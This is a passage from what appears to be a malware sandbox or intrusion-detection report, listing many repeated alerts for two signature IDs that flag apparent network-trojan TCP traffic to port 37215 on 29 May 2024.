                SID:2829579
                Source Port:34970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335782
                SID:2829579
                Source Port:44422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728762
                SID:2835222
                Source Port:60442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986251
                SID:2829579
                Source Port:54408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139850
                SID:2835222
                Source Port:53032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464772
                SID:2829579
                Source Port:42524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873603
                SID:2829579
                Source Port:56594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783879
                SID:2835222
                Source Port:46798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025587
                SID:2829579
                Source Port:50910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.978367
                SID:2829579
                Source Port:39808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947166
                SID:2835222
                Source Port:43162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418089
                SID:2829579
                Source Port:44738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984824
                SID:2835222
                Source Port:47956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.230118
                SID:2835222
                Source Port:58940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369851
                SID:2829579
                Source Port:34496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140995
                SID:2835222
                Source Port:47754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688858
                SID:2829579
                Source Port:45384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038561
                SID:2829579
                Source Port:42414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655962
                SID:2835222
                Source Port:49558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931446
                SID:2829579
                Source Port:57424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994479
                SID:2829579
                Source Port:41458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422193
                SID:2835222
                Source Port:53746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572668
                SID:2835222
                Source Port:59186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665784
                SID:2835222
                Source Port:41380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263333
                SID:2829579
                Source Port:43282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.569491
                SID:2835222
                Source Port:45600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653442
                SID:2829579
                Source Port:47070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.129297
                SID:2829579
                Source Port:51436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135766
                SID:2835222
                Source Port:51632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076330
                SID:2835222
                Source Port:40328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790851
                SID:2829579
                Source Port:48724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.873778
                SID:2835222
                Source Port:42700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779884
                SID:2835222
                Source Port:35698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571456
                SID:2835222
                Source Port:54128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328407
                SID:2835222
                Source Port:56884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163618
                SID:2835222
                Source Port:36366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445644
                SID:2835222
                Source Port:34272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.027429
                SID:2835222
                Source Port:58050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240436
                SID:2829579
                Source Port:38244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321772
                SID:2835222
                Source Port:37358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440713
                SID:2835222
                Source Port:33698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014813
                SID:2835222
                Source Port:55298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948106
                SID:2829579
                Source Port:50934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228046
                SID:2829579
                Source Port:44948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583610
                SID:2829579
                Source Port:47002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332561
                SID:2829579
                Source Port:47088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.809593
                SID:2829579
                Source Port:43292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336538
                SID:2829579
                Source Port:55924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226869
                SID:2829579
                Source Port:56878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141137
                SID:2835222
                Source Port:41058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.744941
                SID:2829579
                Source Port:51894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.131749
                SID:2829579
                Source Port:54176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655802
                SID:2829579
                Source Port:55880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.390248
                SID:2829579
                Source Port:58984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369899
                SID:2829579
                Source Port:57246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833671
                SID:2829579
                Source Port:55880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959129
                SID:2829579
                Source Port:36160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163470
                SID:2829579
                Source Port:51330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863067
                SID:2829579
                Source Port:56948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863333
                SID:2829579
                Source Port:47656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897673
                SID:2835222
                Source Port:55974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728622
                SID:2829579
                Source Port:34890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982414
                SID:2835222
                Source Port:44110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586843
                SID:2835222
                Source Port:54902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557132
                SID:2835222
                Source Port:58048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.920530
                SID:2835222
                Source Port:48524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.215512
                SID:2835222
                Source Port:43006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882747
                SID:2829579
                Source Port:57250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434198
                SID:2835222
                Source Port:41078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037650
                SID:2835222
                Source Port:58030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788298
                SID:2835222
                Source Port:48128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.235403
                SID:2829579
                Source Port:57212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.673661
                SID:2829579
                Source Port:39490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013138
                SID:2835222
                Source Port:55180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173228
                SID:2835222
                Source Port:45484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207685
                SID:2835222
                Source Port:36836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794398
                SID:2835222
                Source Port:56526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.531564
                SID:2829579
                Source Port:58070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873082
                SID:2829579
                Source Port:41488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227352
                SID:2829579
                Source Port:49576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896116
                SID:2829579
                Source Port:37552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171770
                SID:2835222
                Source Port:55350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.907901
                SID:2829579
                Source Port:37416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165855
                SID:2835222
                Source Port:56594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572309
                SID:2835222
                Source Port:49926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240851
                SID:2829579
                Source Port:49972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421075
                SID:2835222
                Source Port:43514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498512
                SID:2829579
                Source Port:47530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959058
                SID:2829579
                Source Port:47720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508452
                SID:2829579
                Source Port:48714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688913
                SID:2829579
                Source Port:34534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182341
                SID:2835222
                Source Port:36434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227845
                SID:2835222
                Source Port:36636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237424
                SID:2829579
                Source Port:59816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871875
                SID:2829579
                Source Port:35092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654809
                SID:2835222
                Source Port:34090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903493
                SID:2835222
                Source Port:42160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897610
                SID:2829579
                Source Port:57478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.813107
                SID:2835222
                Source Port:45480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711347
                SID:2829579
                Source Port:60482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.441205
                SID:2829579
                Source Port:47228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462576
                SID:2829579
                Source Port:54950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896344
                SID:2829579
                Source Port:56936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899587
                SID:2835222
                Source Port:37884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.674910
                SID:2835222
                Source Port:41058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811508
                SID:2829579
                Source Port:41220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432378
                SID:2835222
                Source Port:51142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502588
                SID:2835222
                Source Port:35944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781671
                SID:2829579
                Source Port:48954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990761
                SID:2829579
                Source Port:55314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429336
                SID:2835222
                Source Port:36350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644757
                SID:2835222
                Source Port:37780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770687
                SID:2829579
                Source Port:60138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024442
                SID:2829579
                Source Port:44668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.567385
                SID:2835222
                Source Port:53984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024876
                SID:2829579
                Source Port:46528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869352
                SID:2829579
                Source Port:51498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182551
                SID:2829579
                Source Port:49588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.848303
                SID:2829579
                Source Port:36348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980198
                SID:2835222
                Source Port:45210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715005
                SID:2835222
                Source Port:39574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770310
                SID:2835222
                Source Port:44014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359838
                SID:2835222
                Source Port:47556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022373
                SID:2829579
                Source Port:59172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868165
                SID:2835222
                Source Port:43180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.705901
                SID:2829579
                Source Port:44828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687288
                SID:2829579
                Source Port:34476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278501
                SID:2835222
                Source Port:50842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988777
                SID:2835222
                Source Port:47570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836576
                SID:2829579
                Source Port:37002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.708404
                SID:2829579
                Source Port:40518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372190
                SID:2835222
                Source Port:35088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.636230
                SID:2829579
                Source Port:51218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208848
                SID:2829579
                Source Port:59794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630840
                SID:2829579
                Source Port:41794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874997
                SID:2829579
                Source Port:47018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140030
                SID:2835222
                Source Port:47932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814572
                SID:2835222
                Source Port:53428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035262
                SID:2829579
                Source Port:33830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113967
                SID:2829579
                Source Port:50504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375315
                SID:2835222
                Source Port:54022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335510
                SID:2835222
                Source Port:41452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964962
                SID:2835222
                Source Port:52394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867952
                SID:2835222
                Source Port:49838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869315
                SID:2835222
                Source Port:59764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218049
                SID:2829579
                Source Port:44908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864083
                SID:2829579
                Source Port:44614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091679
                SID:2829579
                Source Port:48096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833510
                SID:2829579
                Source Port:58222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175411
                SID:2835222
                Source Port:57744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.612458
                SID:2829579
                Source Port:43676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631648
                SID:2829579
                Source Port:58156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.986002
                SID:2829579
                Source Port:34126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321820
                SID:2835222
                Source Port:33180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555499
                SID:2835222
                Source Port:33374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265309
                SID:2829579
                Source Port:33826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968320
                SID:2835222
                Source Port:41158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878058
                SID:2829579
                Source Port:60866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023198
                SID:2835222
                Source Port:44610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223060
                SID:2829579
                Source Port:59666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.932062
                SID:2829579
                Source Port:54378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217941
                SID:2835222
                Source Port:42112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140723
                SID:2829579
                Source Port:51684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464124
                SID:2835222
                Source Port:40008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.891480
                SID:2835222
                Source Port:52892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074986
                SID:2829579
                Source Port:39156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287875
                SID:2829579
                Source Port:46838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.810317
                SID:2829579
                Source Port:33596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574617
                SID:2835222
                Source Port:44508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893634
                SID:2829579
                Source Port:38308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154449
                SID:2835222
                Source Port:49150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835920
                SID:2829579
                Source Port:51728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763487
                SID:2829579
                Source Port:48366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228285
                SID:2829579
                Source Port:46440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074754
                SID:2835222
                Source Port:43022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664494
                SID:2829579
                Source Port:33458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282126
                SID:2835222
                Source Port:49058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.743563
                SID:2829579
                Source Port:43544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719441
                SID:2835222
                Source Port:40222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810392
                SID:2829579
                Source Port:47846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228450
                SID:2835222
                Source Port:48486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.460464
                SID:2835222
                Source Port:34654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226879
                SID:2829579
                Source Port:41856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.822897
                SID:2835222
                Source Port:58878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653031
                SID:2835222
                Source Port:53116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170308
                SID:2829579
                Source Port:35460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418832
                SID:2835222
                Source Port:33696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277186
                SID:2829579
                Source Port:58346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.092124
                SID:2835222
                Source Port:42546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.282476
                SID:2835222
                Source Port:55998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782244
                SID:2829579
                Source Port:40570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.609740
                SID:2829579
                Source Port:46790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257347
                SID:2835222
                Source Port:34806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.696358
                SID:2829579
                Source Port:54376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238906
                SID:2835222
                Source Port:53806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664055
                SID:2829579
                Source Port:47322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025404
                SID:2835222
                Source Port:59336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628459
                SID:2835222
                Source Port:41754
                Destination Port:37215
